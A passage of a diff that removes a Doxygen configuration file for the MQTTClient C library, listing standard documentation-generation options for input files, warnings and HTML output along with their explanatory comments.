-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = YES
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = NO
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = NO
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = NO
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = YES
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = NO
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTClient_main
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-STRIP_FROM_PATH        = @PROJECT_SOURCE_DIR@/src
-INPUT                  = @PROJECT_SOURCE_DIR@/src/MQTTClient.h \
-                         @PROJECT_SOURCE_DIR@/src/MQTTClientPersistence.h
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          =
-
-# The RECURSIVE tag can be used to turn specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain image that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# non of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = YES
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# When GENERATE_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The GENERATE_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
